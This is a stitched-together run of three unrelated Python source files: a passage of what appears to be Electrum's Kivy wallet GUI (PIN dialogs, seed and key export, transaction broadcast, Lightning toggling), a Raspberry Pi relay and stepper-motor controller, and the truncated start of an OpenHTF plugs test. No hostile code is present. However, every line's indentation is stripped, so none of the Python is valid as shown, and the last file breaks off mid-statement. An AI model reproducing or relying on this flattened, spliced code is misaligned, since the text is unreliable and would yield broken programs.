@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.set_status(request['status'])
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
status = invoice['status']
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.set_status(status)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_channels, ['channels_updated'])
self.network.register_callback(self.on_channel, ['channel'])
self.network.register_callback(self.on_invoice_status, ['invoice_status'])
self.network.register_callback(self.on_request_status, ['request_status'])
self.network.register_callback(self.on_channel_db, ['channel_db'])
self.network.register_callback(self.set_num_peers, ['gossip_peers'])
self.network.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
if storage.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage)
else:
self.on_wizard_complete(wizard=None, storage=storage)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if platform == 'android' and wallet.has_password():
self.password_dialog(wallet=wallet, msg=_('Enter PIN code'),
on_success=lambda x: self.load_wallet(wallet), on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(wallet=storage, msg=_('Enter PIN code'),
on_success=on_password, on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if not self.wallet.has_lightning():
self.show_error('Lightning not enabled on this wallet')
return
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(wallet=self.wallet, msg=_('Enter PIN'), on_success=None, on_failure=self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(wallet=self.wallet, msg=msg, on_success=on_success, on_failure=lambda: None)
else:
f(*(args + (None,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, *, wallet: Union[Abstract_Wallet, WalletStorage],
msg: str, on_success: Callable = None, on_failure: Callable = None):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet=wallet, msg=msg,
on_success=on_success, on_failure=on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, wallet=self.wallet, msg=message,
on_success=on_success, on_failure=on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
device_controller.py
|
'''
Created on 2013.09.21.
'''
import RPi.GPIO as GPIO
import time
import os
from threading import Thread
from config.config import SensorConfig
class RelayController(object):
relayGpio = None
talkThread = None
motoFwThread = None
motoBwThread = None
runMoto = False
w1 = None
w2 = None
w3 = None
w4 = None
def __init__(self, relayGpio=SensorConfig.GPIO_RELAY_IN_1, delay=SensorConfig.TIME_MOTOR_SPEED_FAST):
self.relayGpio = relayGpio
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.relayGpio, GPIO.OUT)
GPIO.output(self.relayGpio, 1)
GPIO.setmode(GPIO.BCM)
#GPIO.setup(SensorConfig.GPIO_MOTOR_ENABLE, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_1, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_2, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_3, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_4, GPIO.OUT)
#GPIO.output(GPIO_MOTOR_ENABLE, 1)
self.delay = delay
def setStep(self, w1, w2, w3, w4):
GPIO.output(SensorConfig.GPIO_MOTOR_IN_1, w1)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_2, w2)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_3, w3)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_4, w4)
def startMotoFw(self):
while self.runMoto:
self.setStep(1,0,0,1)
time.sleep(self.delay)
self.setStep(1,1,0,0)
time.sleep(self.delay)
self.setStep(0,1,1,0)
time.sleep(self.delay)
self.setStep(0,0,1,1)
time.sleep(self.delay)
def setOn(self):
if GPIO.input(self.relayGpio) == 1:
self.talkThread = Thread(target=self.talkOn)
self.talkThread.start()
GPIO.output(self.relayGpio, 0)
def setOff(self):
GPIO.output(self.relayGpio, 1)
def switch(self):
GPIO.output(self.relayGpio, not GPIO.input(self.relayGpio))
if self.motoFwThread is None:
self.runMoto = True
self.motoFwThread = Thread(target=self.startMotoFw)
self.motoFwThread.start()
else:
self.motoFwThread = None
self.runMoto = False
def isRelayOn(self):
# The relay is driven active-low (setOn writes 0), so "on" means the pin reads 0.
return GPIO.input(self.relayGpio) == 0
def talkOn(self):
os.system('espeak -vf3 "turning on the light"')
self.talkThread = None
class MotorController(object):
w1 = None
w2 = None
w3 = None
w4 = None
def __init__(self, delay=SensorConfig.TIME_MOTOR_SPEED_FAST):
GPIO.setmode(GPIO.BCM)
#GPIO.setup(GPIO_MOTOR_ENABLE, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_1, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_2, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_3, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_4, GPIO.OUT)
#GPIO.output(GPIO_MOTOR_ENABLE, 1)
self.delay = delay
def setStep(self, w1, w2, w3, w4):
GPIO.output(SensorConfig.GPIO_MOTOR_IN_1, w1)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_2, w2)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_3, w3)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_4, w4)
def backward1p(self, steps):
for i in range(0, steps):
self.setStep(0, 0, 0, 1)
time.sleep(self.delay)
self.setStep(0, 0, 1, 0)
time.sleep(self.delay)
self.setStep(0, 1, 0, 0)
time.sleep(self.delay)
self.setStep(1, 0, 0, 0)
time.sleep(self.delay)
def forward1p(self, steps):
for i in range(0, steps):
self.setStep(1, 0, 0, 0)
time.sleep(self.delay)
self.setStep(0, 1, 0, 0)
time.sleep(self.delay)
self.setStep(0, 0, 1, 0)
time.sleep(self.delay)
self.setStep(0, 0, 0, 1)
time.sleep(self.delay)
def backward2p(self, steps):
for i in range(0, steps):
self.setStep(0, 0, 1, 1)
time.sleep(self.delay)
self.setStep(0, 1, 1, 0)
time.sleep(self.delay)
self.setStep(1, 1, 0, 0)
time.sleep(self.delay)
self.setStep(1, 0, 0, 1)
time.sleep(self.delay)
def forward2p(self, steps):
for i in range(0, steps):
self.setStep(1, 0, 0, 1)
time.sleep(self.delay)
self.setStep(1, 1, 0, 0)
time.sleep(self.delay)
self.setStep(0, 1, 1, 0)
time.sleep(self.delay)
self.setStep(0, 0, 1, 1)
time.sleep(self.delay)
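# --- Illustrative sketch (not part of device_controller.py) -----------------
# The forward/backward helpers above walk the same four two-phase-on coil
# states in opposite orders.  A hardware-free way to inspect the pattern that
# setStep() would receive (no RPi.GPIO needed):
FULL_STEP_SEQUENCE = [
    (1, 0, 0, 1),
    (1, 1, 0, 0),
    (0, 1, 1, 0),
    (0, 0, 1, 1),
]

def preview_steps(steps, forward=True):
    """Yield (w1, w2, w3, w4) tuples in the order the motor coils would be driven."""
    sequence = FULL_STEP_SEQUENCE if forward else list(reversed(FULL_STEP_SEQUENCE))
    for i in range(steps):
        yield sequence[i % len(sequence)]

# Example:
# for state in preview_steps(8):
#     print(state)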
|
plugs_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import mock
import openhtf
from openhtf import plugs
from openhtf.util import test
class AdderPlug(plugs.FrontendAwareBasePlug):
INSTANCE_COUNT = 0
LAST_INSTANCE = None
def __init__(self):
super(AdderPlug, self).__init__()
type(self).INSTANCE_COUNT += 1
type(self).LAST_INSTANCE = self
self.state = 'CREATED'
self.number = 0
def _asdict(self):
return {'number': self.number}
def increment(self):
self.number += 1
self.notify_update()
return self.number
def tearDown(self):
self.state = 'TORN DOWN'
class AdderSubclassPlug(AdderPlug):
pass
class DummyPlug(plugs.BasePlug):
pass
class TearDownRaisesPlug1(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class TearDownRaisesPlug2(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class PlugsTest(test.TestCase):
def setUp(self):
self.plug_manager = plugs.PlugManager(
{AdderPlug}, record_logger_name='mock.logger.for.openhtf')
AdderPlug.INSTANCE_COUNT = 0
def tearDown(self):
self.plug_manager.tear_down_plugs()
def test_base_plug(self):
plug = plugs.BasePlug()
self.assertEqual({}, plug._asdict())
plug.tearDown()
def test_initialize(self):
self.assertEqual(0, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs({AdderPlug})
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(
AdderPlug.LAST_INSTANCE,
self.plug_manager.provide_plugs(
(('adder_plug', AdderPlug),))['adder_plug'])
adder_plug_name = AdderPlug.__module__ + '.AdderPlug'
self.assertEqual(
{
adder_plug_name: {'mro': [adder_plug_name]}
},
self.plug_manager._asdict()['plug_descriptors']
)
self.assertEqual(
{
adder_plug_name: {'number': 0}
},
